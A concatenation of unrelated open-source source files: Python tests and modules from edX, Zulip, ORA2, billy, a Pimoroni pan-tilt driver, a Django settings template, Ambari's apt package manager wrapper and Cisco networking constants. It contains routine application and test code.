fintech-circle/edx-platform | openedx/core/djangoapps/waffle_utils/tests/test_init.py | Python | agpl-3.0 | 2,228 | 0.004039 | """
Tests for waffle utils features.
"""
import ddt
from django.test import TestCase
from mock import patch
from opaque_keys.edx.keys import CourseKey
from waffle.testutils import override_flag
from request_cache. | middleware import RequestCache
from .. import CourseWaffleFlag, WaffleFlagNamespace
from ..models import WaffleFlagCourseOverrideModel
@ddt.ddt
class TestCourseWaffleFlag(TestCase):
"""
Tests the CourseWaffleFlag.
"""
NAMESPACE_NAME = "test_namespace"
FLAG_NAME = "test_flag"
NAMESPACED_FLAG_NAME = NAMESPACE_NAME + "." + FLAG_NAME
TEST_COURSE_KEY | = CourseKey.from_string("edX/DemoX/Demo_Course")
TEST_NAMESPACE = WaffleFlagNamespace(NAMESPACE_NAME)
TEST_COURSE_FLAG = CourseWaffleFlag(TEST_NAMESPACE, FLAG_NAME)
@ddt.data(
{'course_override': WaffleFlagCourseOverrideModel.ALL_CHOICES.on, 'waffle_enabled': False, 'result': True},
{'course_override': WaffleFlagCourseOverrideModel.ALL_CHOICES.off, 'waffle_enabled': True, 'result': False},
{'course_override': WaffleFlagCourseOverrideModel.ALL_CHOICES.unset, 'waffle_enabled': True, 'result': True},
{'course_override': WaffleFlagCourseOverrideModel.ALL_CHOICES.unset, 'waffle_enabled': False, 'result': False},
)
def test_course_waffle_flag(self, data):
"""
Tests various combinations of a flag being set in waffle and overridden
for a course.
"""
RequestCache.clear_request_cache()
with patch.object(WaffleFlagCourseOverrideModel, 'override_value', return_value=data['course_override']):
with override_flag(self.NAMESPACED_FLAG_NAME, active=data['waffle_enabled']):
# check twice to test that the result is properly cached
self.assertEqual(self.TEST_COURSE_FLAG.is_enabled(self.TEST_COURSE_KEY), data['result'])
self.assertEqual(self.TEST_COURSE_FLAG.is_enabled(self.TEST_COURSE_KEY), data['result'])
# result is cached, so override check should happen once
WaffleFlagCourseOverrideModel.override_value.assert_called_once_with(
self.NAMESPACED_FLAG_NAME,
self.TEST_COURSE_KEY
)
|
Assassinss/daily-artwork | src/worker.py | Python | gpl-3.0 | 229 | 0 | from src import cron
from src.api import | Api
api = Api()
def fetch_photo():
api.fetch_photo()
@cron.route('/worker', methods=['GET'])
def scheduler_worker():
fe | tch_photo()
return 'fetch photo...'
|
brainwane/zulip | zerver/data_import/hipchat_user.py | Python | apache-2.0 | 2,581 | 0 | from typing import Any, Dict, List
from django.utils.timezone import now as timezone_now
from zerver.data_import.import_util import build_user_profile
from zerver.models import UserProfile
class UserHandler:
'''
Our UserHandler class is a glorified wrapper
around the data that eventually goes into
zerver_userprofile.
The class helps us do things lik | e map ids
to names for mentions.
We also sometimes need to build mirror
users on the fly.
'''
def __init__(self) -> None:
self.id_to_user_map: Dict[int, Dict[str, Any]] = dict()
self.name_to_mirror_user_map: Dict[str, Dict[str, Any]] = dict()
self.mirror_user_id = 1
def add_user(self, user: Dict[str, Any]) - | > None:
user_id = user['id']
self.id_to_user_map[user_id] = user
def get_user(self, user_id: int) -> Dict[str, Any]:
user = self.id_to_user_map[user_id]
return user
def get_mirror_user(self,
realm_id: int,
name: str) -> Dict[str, Any]:
if name in self.name_to_mirror_user_map:
user = self.name_to_mirror_user_map[name]
return user
user_id = self._new_mirror_user_id()
short_name = name
full_name = name
email = f'mirror-{user_id}@example.com'
delivery_email = email
avatar_source = 'G'
date_joined = int(timezone_now().timestamp())
timezone = 'UTC'
user = build_user_profile(
avatar_source=avatar_source,
date_joined=date_joined,
delivery_email=delivery_email,
email=email,
full_name=full_name,
id=user_id,
is_active=False,
role=UserProfile.ROLE_MEMBER,
is_mirror_dummy=True,
realm_id=realm_id,
short_name=short_name,
timezone=timezone,
)
self.name_to_mirror_user_map[name] = user
return user
def _new_mirror_user_id(self) -> int:
next_id = self.mirror_user_id
while next_id in self.id_to_user_map:
next_id += 1
self.mirror_user_id = next_id + 1
return next_id
def get_normal_users(self) -> List[Dict[str, Any]]:
users = list(self.id_to_user_map.values())
return users
def get_all_users(self) -> List[Dict[str, Any]]:
normal_users = self.get_normal_users()
mirror_users = list(self.name_to_mirror_user_map.values())
all_users = normal_users + mirror_users
return all_users
|
kursitet/edx-ora2 | openassessment/assessment/api/self.py | Python | agpl-3.0 | 12,139 | 0.001812 | """
Public interface for self-assessment.
"""
import logging
from django.db import DatabaseError, transaction
from dogapi import dog_stats_api
from submissions.api import get_submission_and_student, SubmissionNotFoundError
from openassessment.assessment.serializers import (
InvalidRubric, full_assessment_dict, rubric_from_dict, serialize_assessments
)
from openassessment.assessment.models import (
Assessment, AssessmentPart, InvalidRubricSelection
)
from openassessment.assessment.errors import (
SelfAssessmentRequestError, SelfAssessmentInternalError
)
# Assessments are tagged as "self-evaluation"
SELF_TYPE = "SE"
logger = logging.getLogger("openassessment.assessment.api.self")
def submitter_is_finished(submission_uuid, requirements):
"""
Check whether a self-assessment has been completed for a submission.
Args:
submission_uuid (str): The unique identifier of the submission.
requirements (dict): Any attributes of the assessment module required
to determine if this assessment is complete. There are currently
no requirements for a self-assessment.
Returns:
True if the submitter has assessed their answer
Examples:
>>> submitter_is_finished('222bdf3d-a88e-11e3-859e-040ccee02800', {})
True
"""
return Assessment.objects.filter(
score_type=SELF_TYPE, submission_uuid=submission_uuid
).exists()
def assessment_is_finished(submission_uuid, requirements):
"""
Check whether a self-assessment has been completed. For self-assessment,
this function is synonymous with submitter_is_finished.
Args:
submission_uuid (str): The unique identifier of the submission.
requirements (dict): Any attributes of the assessment module required
to determine if this assessment is complete. There are currently
no requirements for a self-assessment.
Returns:
True if the assessment is complete.
Examples:
>>> assessment_is_finished('222bdf3d-a88e-11e3-859e-040ccee02800', {})
True
"""
return submitter_is_finished(submission_uuid, requirements)
def get_score(submission_uuid, requirements):
"""
Get the score for this particular assessment.
Args:
submission_uuid (str): The unique identifier for the submission
requirements (dict): Not used.
Returns:
A dict of points earned and points possible for the given submission.
Returns None if no score can be determined yet.
Examples:
>>> get_score('222bdf3d-a88e-11e3-859e-040ccee02800', {})
{
'points_earned': 5,
'points_possible': 10
}
"""
assessment = get_assessment(submission_uuid)
if not assessment:
return None
return {
"points_earned": assessment["points_earned"],
"points_possible": assessment["points_possible"]
}
def create_assessment(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at=None
):
"""
Create a self-assessment for a submission.
Args:
submission_uuid (str): The unique identifier for the submission being assessed.
user_id (str): The ID of the user creating the assessment. This must match the ID of the user who made the submission.
options_selected (dict): Mapping of rubric criterion names to option values selected.
criterion_feedback (dict): Dictionary mapping criterion names to the
free-form text feedback the user gave for the criterion.
Since criterion feedback is optional, some criteria may not appear
in the dictionary.
overall_feedback (unicode): Free-form text feedback on the submission overall.
rubric_dict (dict): Serialized Rubric model.
Keyword Arguments:
scored_at (datetime): The timestamp of the assessment; defaults to the current time.
Returns:
dict: serialized Assessment model
Raises:
SelfAssessmentRequestError: Could not retrieve a submission that the user is allowed to score.
"""
# Check that there are not any assessments for this submission
if Assessment.objects.filter(submission_uuid=submission_uuid, score_type=SELF_TYPE).exists():
msg = (
u"Cannot submit a self-assessment for the submission {uuid} "
"because another self-assessment already exists for that submission."
).format(uuid=submission_uuid)
raise SelfAssessmentRequestError(msg)
# Check that the student is allowed to assess this submission
try:
submission = get_submission_and_student(submission_uuid)
if submission['student_item']['student_id'] != user_id:
msg = (
u"Cannot submit a self-assessment for the submission {uuid} "
u"because it was created by another student "
u"(submission student ID {student_id} does not match your "
u"student id {other_id})"
).format(
uuid=submission_uuid,
student_id=submission['student_item']['student_id'],
other_id=user_id
)
raise SelfAssessmentRequestError(msg)
except SubmissionNotFoundError:
msg = (
"Could not submit a self-assessment because no submission "
"exists with UUID {uuid}"
).format(uuid=submission_uuid)
raise SelfAssessmentRequestError()
try:
assessment = _complete_assessmen | t(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at
)
_log_assessment(assessment, submission)
except InvalidRubric as ex:
msg = "Invalid rubric definition: " + str(ex)
| logger.warning(msg, exc_info=True)
raise SelfAssessmentRequestError(msg)
except InvalidRubricSelection as ex:
msg = "Selected options do not match the rubric: " + str(ex)
logger.warning(msg, exc_info=True)
raise SelfAssessmentRequestError(msg)
except DatabaseError:
error_message = (
u"Error creating self assessment for submission {}"
).format(submission_uuid)
logger.exception(error_message)
raise SelfAssessmentInternalError(error_message)
# Return the serialized assessment
return full_assessment_dict(assessment)
@transaction.commit_on_success
def _complete_assessment(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at
):
"""
Internal function for creating an assessment and its parts atomically.
Args:
submission_uuid (str): The unique identifier for the submission being
assessed.
user_id (str): The ID of the user creating the assessment. This must
match the ID of the user who made the submission.
options_selected (dict): Mapping of rubric criterion names to option
values selected.
criterion_feedback (dict): Dictionary mapping criterion names to the
free-form text feedback the user gave for the criterion.
Since criterion feedback is optional, some criteria may not appear
in the dictionary.
overall_feedback (unicode): Free-form text feedback on the submission overall.
rubric_dict (dict): Serialized Rubric model.
scored_at (datetime): The timestamp of the assessment.
Returns:
Assessment model
"""
# Get or create the rubric
rubric = rubric_from_dict(rubric_dict)
# Create the self assessment
assessment = Assessment.create(
rubric,
user_id,
submission_uuid,
SELF_TYPE,
scored_at=scored_at,
feedback=overall_feedback
)
# This will raise an `InvalidRubricSelection` if the selected options do not match the rubric.
AssessmentPart.create_from_option_names(assessment, options_selected, |
loandy/billy | billy/reports/bills.py | Python | bsd-3-clause | 8,433 | 0.000119 | import datetime
import logging
from collections import defaultdict
from billy.core import db
from billy.core import settings
from billy.utils import term_for_session
from billy.reports.utils import (update_common, get_quality_exceptions,
combine_reports)
logger = logging.getLogger('billy')
def _bill_report_dict():
return {'upper_count': 0,
'lower_count': 0,
'bill_types': defaultdict(int),
'_updated_this_year_count': 0,
'_updated_this_month_count': 0,
'_updated_today_count': 0,
'actions_unsorted': set(),
'actionless_count': 0,
'action_count': 0,
'actions_per_type': defaultdict(int),
'actions_per_actor': defaultdict(int),
'actions_per_month': defaultdict(int),
'sponsorless_count': 0,
'_sponsor_count' | : 0,
'_sponsors_with_i | d_count': 0,
'sponsors_per_type': defaultdict(int),
'_subjects_count': 0,
'bills_per_subject': defaultdict(int),
'versionless_count': 0,
'version_count': 0,
'unmatched_sponsors': set(),
'progress_meter_gaps': set(),
}
def scan_bills(abbr):
duplicate_sources = defaultdict(int)
duplicate_versions = defaultdict(int)
other_actions = defaultdict(int)
uncategorized_subjects = defaultdict(int)
sessions = defaultdict(_bill_report_dict)
# load exception data into sets of ids indexed by exception type
quality_exceptions = get_quality_exceptions(abbr)
for bill in db.bills.find({settings.LEVEL_FIELD: abbr}):
session_d = sessions[bill['session']]
# chamber count & bill_types
if bill['chamber'] == 'lower':
session_d['lower_count'] += 1
elif bill['chamber'] == 'upper':
session_d['upper_count'] += 1
for type in bill['type']:
session_d['bill_types'][type] += 1
update_common(bill, session_d)
# actions
last_date = datetime.datetime(1900, 1, 1)
for action in bill['actions']:
date = action['date']
if date < last_date:
session_d['actions_unsorted'].add(bill['_id'])
session_d['action_count'] += 1
for type in action['type']:
session_d['actions_per_type'][type] += 1
if 'other' in action['type']:
other_actions[action['action']] += 1
session_d['actions_per_actor'][action['actor']] += 1
session_d['actions_per_month'][date.strftime('%Y-%m')] += 1
# handle no_actions bills
if not bill['actions']:
if bill['_id'] not in quality_exceptions['bills:no_actions']:
session_d['actionless_count'] += 1
else:
quality_exceptions['bills:no_actions'].remove(bill['_id'])
# sponsors
for sponsor in bill['sponsors']:
session_d['_sponsor_count'] += 1
if sponsor.get('leg_id') or sponsor.get('committee_id'):
session_d['_sponsors_with_id_count'] += 1
else:
# keep list of unmatched sponsors
session_d['unmatched_sponsors'].add(
(term_for_session(abbr, bill['session']), bill['chamber'],
sponsor['name'])
)
session_d['sponsors_per_type'][sponsor['type']] += 1
# handle no sponsors bills
if not bill['sponsors']:
if bill['_id'] not in quality_exceptions['bills:no_sponsors']:
session_d['sponsorless_count'] += 1
else:
quality_exceptions['bills:no_sponsors'].remove(bill['_id'])
# subjects
for subj in bill.get('scraped_subjects', []):
uncategorized_subjects[subj] += 1
if bill.get('subjects'):
session_d['_subjects_count'] += 1
for subject in bill['subjects']:
session_d['bills_per_subject'][subject] += 1
# sources
for source in bill['sources']:
duplicate_sources[source['url']] += 1
# versions
if not bill['versions']:
# total num of bills w/o versions
if bill['_id'] not in quality_exceptions['bills:no_versions']:
session_d['versionless_count'] += 1
else:
quality_exceptions['bills:no_versions'].remove(bill['_id'])
else:
# total num of versions
session_d['version_count'] += len(bill['versions'])
for doc in bill['versions']:
duplicate_versions[doc['url']] += 1
# TODO: add duplicate document detection back in?
# Check for progress meter gaps.
progress_meter_gaps = session_d['progress_meter_gaps']
action_dates = bill['action_dates']
bill_chamber = bill['chamber']
other_chamber = dict(lower='upper', upper='lower')[bill_chamber]
# Check for bills that were signed but didn't pass both chambers.
if bill['type'] == 'bill':
if action_dates['signed']:
if not action_dates['passed_upper']:
progress_meter_gaps.add(bill['_id'])
elif not action_dates['passed_lower']:
progress_meter_gaps.add(bill['_id'])
else:
# Check for nonbills that were signed but didn't pass their
# house of origin.
if action_dates['signed']:
if not action_dates['passed_' + bill_chamber]:
progress_meter_gaps.add(bill['_id'])
if action_dates['passed_' + other_chamber]:
if not action_dates['passed_' + bill_chamber]:
progress_meter_gaps.add(bill['_id'])
dup_version_urls = []
dup_source_urls = []
for url, n in duplicate_versions.iteritems():
if n > 1:
dup_version_urls.append(url)
for url, n in duplicate_sources.iteritems():
if n > 1:
dup_source_urls.append(url)
# do logging of unnecessary exceptions
for qe_type, qes in quality_exceptions.iteritems():
if qes:
logger.warning('unnecessary {0} exceptions for {1} bills: \n {2}'
.format(qe_type, len(qes), '\n '.join(qes)))
return {'duplicate_versions': dup_version_urls,
'duplicate_sources': dup_source_urls,
'other_actions': other_actions.items(),
'uncategorized_subjects': uncategorized_subjects.items(),
'sessions': sessions,
'progress_meter_gaps': []
}
def calculate_percentages(report):
# general bill stuff
bill_count = float(report['upper_count'] + report['lower_count']) / 100
if bill_count:
report['updated_this_year'] = (report.pop('_updated_this_year_count') /
bill_count)
report['updated_this_month'] = (report.pop('_updated_this_month_count')
/ bill_count)
report['updated_today'] = (report.pop('_updated_today_count') /
bill_count)
report['have_subjects'] = report.pop('_subjects_count') / bill_count
# actions
action_count = float(report['action_count']) / 100
if action_count:
for k in report['actions_per_type'].iterkeys():
report['actions_per_type'][k] /= action_count
for k in report['actions_per_actor'].iterkeys():
report['actions_per_actor'][k] /= action_count
for k in report['actions_per_month'].iterkeys():
report['actions_per_month'][k] /= action_count
# sponsors
_sponsor_count = float(report.pop('_sponsor_count')) / 100
if _sponsor_count:
report['sponsors_with_id'] = (
report.pop('_sponsors_with_id_count') / _sponsor_count)
for k in report['sponsors_per_type'].iterkeys():
report['sponsors_per_type'][k] /= _sponsor_count
def bill_report(abbr):
report = scan_bills(abbr)
combined_report = combine_reports(report['sessi |
WayneKeenan/picraftzero | picraftzero/thirdparty/pimoroni/pantilthat/__init__.py | Python | mit | 1,293 | 0.003094 | from sys import exit, version_info
import logging
logger = logging.getLogger(__name__)
try:
from smbus import SMBus
except ImportError:
if version_info[0] < 3:
logger.warning("Falling back to mock SMBus. This library requires python-smbus. Install with: sudo apt-get install python-smbus")
elif version_info[0] == 3:
logger.warning("Falling back to mock SMBus. This library requires python3-smbus. Install with: sudo apt-get install python3-smbus")
from picraftzero.thirdparty.mocks.raspiberrypi.rpidevmocks import Mock_smbusModule
SMBus = Mock_smbusModule.SMBus
from .pantilt import PanTilt, WS2812, PWM, RGB, GRB, RGBW, GRBW
__version__ = '0.0.3'
pantilthat = PanTilt(i2c_bus=SMBus(1))
brightness = pantilthat.brightness
idle_timeout = pantilthat.idle_timeout
clear = pantilthat.clear
light_mode = pantilthat.light_mode
light_type = pantilthat.l | ight_type
servo_one = pantilthat.servo_one
servo_pulse_max = pantilthat.servo_pulse_max
servo_pulse_min = pantilthat.servo_pulse_min
servo_two = pantilthat.servo_two
servo_enable = pantilthat.servo_enable
set_all = pantilthat.set_all
set_pixel = pantilthat.set_pixel
set_pixel_rgbw = pantilthat.set_pixel_rgbw
show = pantilthat.show
pan = pantilthat.servo_o | ne
tilt = pantilthat.servo_two
|
moshthepitt/answers | template/settings.py | Python | mit | 6,081 | 0.000164 | """
Django settings for template project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in prod | uction secret!
SECRET_KEY = 'mgu70)6s2vl#66ymf-iz=i8z05q==adv@6^*6^$8@p$bp8v04c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'suit',
# django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.flatpages',
| 'django.contrib.humanize',
# custom
'core',
'users',
'questions',
'answers',
'reviews',
'reports',
'saas',
# third party
'allauth',
'allauth.account',
# 'allauth.socialaccount',
# 'allauth.socialaccount.providers.facebook',
# 'allauth.socialaccount.providers.twitter',
'crispy_forms',
'debug_toolbar',
'datatableview',
'compressor',
'sorl.thumbnail',
# 'cacheops',
'suit_redactor',
'mptt',
'autoslug',
'polymorphic',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
# third party
'ajaxerrors.middleware.ShowAJAXErrors',
)
ROOT_URLCONF = 'template.urls'
WSGI_APPLICATION = 'template.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Templates
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'OPTIONS': {
'context_processors': [
# default
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# custom
'django.template.context_processors.request',
"core.context_processors.site_processor",
"core.context_processors.debug_processor",
],
'loaders': [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
]),
],
# 'loaders': [
# 'django.template.loaders.filesystem.Loader',
# 'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
# ],
'debug': False,
},
},
]
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# other finders..
'compressor.finders.CompressorFinder',
)
AUTHENTICATION_BACKENDS = (
# Needed to login by username in Django admin, regardless of `allauth`
"django.contrib.auth.backends.ModelBackend",
# `allauth` specific authentication methods, such as login by e-mail
"allauth.account.auth_backends.AuthenticationBackend"
)
# auth and allauth settings
LOGIN_REDIRECT_URL = '/dashboard'
SOCIALACCOUNT_QUERY_EMAIL = True
EMAIL_CONFIRMATION_DAYS = 14
ACCOUNT_AUTHENTICATION_METHOD = "username_email"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USER_DISPLAY = 'users.utils.get_user_display'
SOCIALACCOUNT_PROVIDERS = {
'facebook': {
'SCOPE': ['email', 'publish_stream'],
'METHOD': 'js_sdk' # instead of 'oauth2'
}
}
ACCOUNT_USERNAME_BLACKLIST = ['mosh', 'moshthepitt', 'kelvin', 'nicole', 'jay', "wambere"]
# crispy forms
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# Pagination
PAGINATION_DEFAULT_PAGINATION = 20
# COMPRESSOR
COMPRESS_CSS_FILTERS = ['compressor.filters.css_default.CssAbsoluteFilter',
'compressor.filters.cssmin.CSSMinFilter']
# CACHE OPS
CACHEOPS_REDIS = {
'host': 'localhost', # redis-server is on same machine
'port': 6379, # default redis port
'db': 2, # SELECT non-default redis database
# using separate redis db or redis instance
# is highly recommended
'socket_timeout': 3,
}
CACHEOPS_DEGRADE_ON_FAILURE = True
CACHEOPS = {
# automatically cache everything
'*.*': ('all', 60 * 10),
}
# Suit
SUIT_CONFIG = {
'ADMIN_NAME': 'JibuPro',
'SEARCH_URL': '',
}
# CELERY STUFF
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Africa/Nairobi'
QUESTION_LABEL_THUMBS_SIZE = "400"
try:
from local_settings import *
except ImportError, e:
pass
|
sekikn/ambari | ambari-common/src/main/python/ambari_commons/repo_manager/apt_manager.py | Python | apache-2.0 | 13,082 | 0.010472 | """
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tempfile
import re
from .generic_manager import GenericManager, GenericManagerProperties
from .apt_parser import AptParser
from ambari_commons.constants import AMBARI_SUDO_BINARY
from ambari_commons import shell
from resource_management.core.logger import Logger
def replace_underscores(function_to_decorate):
def wrapper(*args, **kwargs):
self = args[0]
name = args[1].replace("_", "-")
return function_to_decorate(self, name, *args[2:], **kwargs)
return wrapper
class AptManagerProperties(GenericManagerProperties):
"""
Class to keep all Package-manager depended properties
"""
locked_output = "Unable to lock the administration directory"
repo_error = "Failure when receiving data from the peer"
repo_manager_bin = "/usr/bin/apt-get"
repo_cache_bin = "/usr/bin/apt-cache"
pkg_manager_bin = "/usr/bin/dpkg"
repo_update_cmd = [repo_manager_bin, 'update', '-qq']
available_packages_cmd = [repo_cache_bin, "dump"]
installed_packages_cmd = ['COLUMNS=999', pkg_manager_bin, "-l"]
repo_definition_location = "/etc/apt/sources.list.d"
install_cmd = {
True: [repo_manager_bin, '-o', "Dpkg::Options::=--force-confdef", '--allow-unauthenticated', '--assume-yes', 'install'],
False: [repo_manager_bin, '-q', '-o', "Dpkg::Options::=--force-confdef", '--allow-unauthenticated', '--assume-yes', 'install']
}
remove_cmd = {
True: [repo_manager_bin, '-y', 'remove'],
False: [repo_manager_bin, '-y', '-q', 'remove']
}
verify_dependency_cmd = [repo_manager_bin, '-qq', 'check']
install_cmd_env = {'DEBIAN_FRONTEND': 'noninteractive'}
repo_url_exclude = "ubuntu.com"
configuration_dump_cmd = [AMBARI_SUDO_BINARY, "apt-config", "dump"]
class AptManager(GenericManager):
def get_installed_package_version(self, package_name):
r = shell.subprocess_executor("dpkg -s {0} | grep Version | awk '{{print $2}}'".format(package_name))
return r.out.strip(os.linesep)
@property
def properties(self):
return AptManagerProperties
def installed_packages(self, pkg_names=None, repo_filter=None):
"""
Return all installed pa | ckages in the system except packages in REPO_URL_EXCLUDE
:type pkg_names list|set
:type repo_filter str|None
:return formatted list of packages
"""
packages = []
available_packages = self._available_packages_dict(pkg_names, repo_filter)
with shell.process_executor(self.properties.installed_packages_cmd, error_c | allback=self._executor_error_handler,
strategy=shell.ReaderStrategy.BufferedChunks) as output:
for package, version in AptParser.packages_installed_reader(output):
if package in available_packages:
packages.append(available_packages[package])
if package not in available_packages:
packages.append([package, version, "installed"]) # case, when some package not belongs to any known repo
return packages
def _available_packages(self, pkg_names=None, repo_filter=None):
"""
Returning list of the installed packages with possibility to filter them by name
:type pkg_names list|set
:type repo_filter str|None
"""
with shell.process_executor(self.properties.available_packages_cmd, error_callback=self._executor_error_handler,
strategy=shell.ReaderStrategy.BufferedChunks) as output:
for pkg_item in AptParser.packages_reader(output):
if repo_filter and repo_filter not in pkg_item[2]:
continue
if self.properties.repo_url_exclude in pkg_item[2]:
continue
if pkg_names and pkg_item[0] not in pkg_names:
continue
yield pkg_item
def _available_packages_dict(self, pkg_names=None, repo_filter=None):
"""
Same as available packages, but result returns as dict and package name as key
:type pkg_names list|set
:type repo_filter str|None
"""
result = {}
for item in self._available_packages(pkg_names, repo_filter):
result[item[0]] = item
return result
def available_packages(self, pkg_names=None, repo_filter=None):
"""
Returning list of the installed packages with possibility to filter them by name
:type pkg_names list|set
:type repo_filter str|None
"""
return [item for item in self._available_packages(pkg_names, repo_filter)]
def all_packages(self, pkg_names=None, repo_filter=None):
return self.available_packages(pkg_names, repo_filter)
def transform_baseurl_to_repoid(self, base_url):
"""
Transforms the URL looking like proto://localhost/some/long/path to localhost_some_long_path
:type base_url str
:rtype str
"""
url_proto_mask = "://"
url_proto_pos = base_url.find(url_proto_mask)
if url_proto_pos > 0:
base_url = base_url[url_proto_pos+len(url_proto_mask):]
return base_url.replace("/", "_").replace(" ", "_")
def get_available_packages_in_repos(self, repos):
"""
Gets all (both installed and available) packages that are available at given repositories.
:type repos resource_management.libraries.functions.repository_util.CommandRepository
:return: installed and available packages from these repositories
"""
filtered_packages = []
packages = self.available_packages()
repo_ids = []
for repo in repos.items:
repo_ids.append(self.transform_baseurl_to_repoid(repo.base_url))
if repos.feat.scoped:
Logger.info("Looking for matching packages in the following repositories: {0}".format(", ".join(repo_ids)))
for repo_id in repo_ids:
for package in packages:
if repo_id in package[2]:
filtered_packages.append(package[0])
return filtered_packages
else:
Logger.info("Packages will be queried using all available repositories on the system.")
# this is the case where the hosts are marked as sysprepped, but
# search the repos on-system anyway. the url specified in ambari must match the one
# in the list file for this to work
for repo_id in repo_ids:
for package in packages:
if repo_id in package[2]:
filtered_packages.append(package[0])
if len(filtered_packages) > 0:
Logger.info("Found packages for repo {}".format(str(filtered_packages)))
return filtered_packages
else:
return [package[0] for package in packages]
def package_manager_configuration(self):
"""
Reading apt configuration
:return dict with apt properties
"""
with shell.process_executor(self.properties.configuration_dump_cmd, error_callback=self._executor_error_handler) as output:
configuration = list(AptParser.config_reader(output))
return dict(configuration)
def verify_dependencies(self):
"""
Verify that we have no dependency issues in package manager. Dependency issues could appear because of aborted or terminated
package installation process or invalid packages state after manual modification of packages list on the host
:return True if no dependency issues found, False if dependency issue present
:rtype bool
"""
r = shell.subprocess_executor(self.properties.verify_dependency_cmd)
pattern = re.compile("has missing dependency|E:")
if r.code or (r.out and pattern.search(r.out)):
err_msg = Logger.filter_text("Failed to verify package depen |
Gitweijie/first_project | networking_cisco/apps/saf/agent/topo_disc/topo_disc_constants.py | Python | apache-2.0 | 890 | 0 | # Copyright 2017 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the | specific language governing permissions and limitations
# under the License.
#
# Topology Discovery constants:
# Query LLDP Daemo | n every 15 seconds.
PERIODIC_TASK_INTERVAL = 15
# This means a topology update message will be sent after every minute (15*4),
# even if there's no change in the parameters.
TOPO_DISC_SEND_THRESHOLD = 4
|
ANR-COMPASS/shesha | tests/pytest/rtc/test_rtcUFU.py | Python | gpl-3.0 | 12,177 | 0.003449 | ## @package shesha.tests
## @brief Tests the RTC module
## @author COMPASS Team <https://github.com/ANR-COMPASS>
## @version 5.2.1
## @date 2022/01/24
## @copyright GNU Lesser General Public License
#
# This file is part of COMPASS <https://anr-compass.github.io/compass/>
#
# Copyright (C) 2011-2022 COMPASS Team <https://github.com/ANR-COMPASS>
# All rights reserved.
# Distributed under GNU - LGPL
#
# COMPASS is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser
# General Public License as published by the Free Software Foundation, either version 3 of the License,
# or any later version.
#
# COMPASS: End-to-end AO simulation tool using | GPU acceleration
# The COMPASS platform was designed to meet the need of high-performance for the simulation of AO systems.
#
# The final product includes a software package for simulating all the critical subcomponents of AO,
# particularly in the context of the ELT and a real-time core based on several control approaches,
# with performances consistent with its integration into an instrument. Taking advantage of the specific
# hardware arc | hitecture of the GPU, the COMPASS tool allows to achieve adequate execution speeds to
# conduct large simulation campaigns called to the ELT.
#
# The COMPASS platform can be used to carry a wide variety of simulations to both testspecific components
# of AO of the E-ELT (such as wavefront analysis device with a pyramid or elongated Laser star), and
# various systems configurations such as multi-conjugate AO.
#
# COMPASS is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
